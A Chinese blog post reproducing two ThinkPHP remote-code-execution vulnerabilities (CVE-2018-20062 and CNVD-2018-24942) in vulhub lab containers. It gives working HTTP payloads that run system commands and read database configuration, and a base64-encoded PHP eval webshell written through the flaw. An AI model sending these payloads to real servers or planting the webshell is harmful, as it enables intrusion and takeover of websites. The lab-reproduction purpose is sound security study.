Thinkphp漏洞复现

逃离我推掉我的手 2023-10-07 22:07 108阅读 0赞

Thinkphp简介

Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服 务器环境的轻量级PHP开发框架。很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很 多基于 thinkphp 开发的网站。

Thinkphp历史漏洞












































版本 漏洞类型
ThinkPHP3.2.3 缓存函数设计缺陷可导致Getshell
ThinkPHP3.2.3 最新版update注入漏洞
ThinkPHP3.2.X find_select_delete注入
ThinkPHP3.X order_by注入漏洞
ThinkPHP5.0.X sql注入漏洞
ThinkPHP5.0.10 缓存函数设计缺陷可导致Getshell
ThinkPHP5 SQL注入漏洞&&敏感信息泄露
ThinkPHP5.X order_by注入漏洞
ThinkPHP5.X 远程代码执行

漏洞复现

Thinkphp5.0.23远程代码执行漏洞(CVE-2018-20062)
漏洞简介

Thinkphp5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞

影响版本:
Thinkphp 5.0.0~ 5.0.23

搭建靶场环境
使用vulhub靶场搭建

cd vulhub/thinkphp/5.0.23-rce

docker-compose up -d

a1d11c822f8f41f1928742d0b325a661.png

访问your-ip:8080/?s=captcha

POST提交:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

代码执行成功

35ed7ebece3043e4b4023f7ba62e06a2.png

写入webshell

进入容器:docker exec -it 32736eb79481 /bin/bash

webshell:<?php @eval ($_POST[‘cmd’]);?>

base64编码后:PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=

写入容器:

echo -n PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= | base64 -d > a.php

e1bf12956e3647fb94ea311580be1d30.png

访问:http://your-ip:8080/?s=captcha

POST提交:

  1. _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= | base64 -d >cmd.php

9c1a7015eb624ceba35dde57e568dad7.png

蚁剑链接:

318bbba754a94dce9e0aef52aa77e5c2.png7d6ca70717bf4be8990449c50e0c9125.png

执行命令:

b18e6c38c85b41308fcc5f0d4adf0ede.png

ThinkPHP 5.0.x 未开启强制路由导致的RCE 漏洞分析(CNVD-2018-24942)

原理:框架对传入的路由参数过滤不严格,导致攻击者可以操作非预期的控制器类来远程执行代码。

影响版本:ThinkPHP 5.0.5-5.0.22 || 5.1.0-5.1.30

搭建靶场环境
使用vulhub靶场搭建

cd vulhub/thinkphp/5-rce

docker-compose up -d

payload1:

  1. index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=-1

bb286ce384bb464282afcb0436a337a9.png

payload2:

  1. ?s=index/think\config/get&name=database.username # 获取配置信息
  2. ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id #命令执行

611225335e9449f2af975dba46e9b45c.pngf7dd3bbc8e2e40d3b7a8d950b14eac6e.png

参考链接:

https://www.cnblogs.com/HelloCTF/p/15748360.html

https://blog.csdn.net/qq_61503377/article/details/125989830?spm=1001.2014.3001.5501

发表评论

表情:
评论列表 (有 0 条评论,108人围观)

还没有评论,来说两句吧...

相关阅读

    相关 MSFThinkphp漏洞

    简介 ThinkPHP是一个快速、兼容而且简单的轻量级国产[PHP开发框架][PHP],诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Ap

    相关 fastjson 漏洞

    可能从fastjson“盘古开天地”开始讲,因为我对序列化 反序列化还有那些组件非常不熟悉(谁不搞开发会对这些熟悉)也算复习一下java知识吧,之前好像我自己大二学习java序

    相关 XSS漏洞

    XSS漏洞复现 实验环境DVWA > XSS(cross site script) 跨站脚本。属于代码执行的一种,这里执行的是前端代码,一般是javascript代码。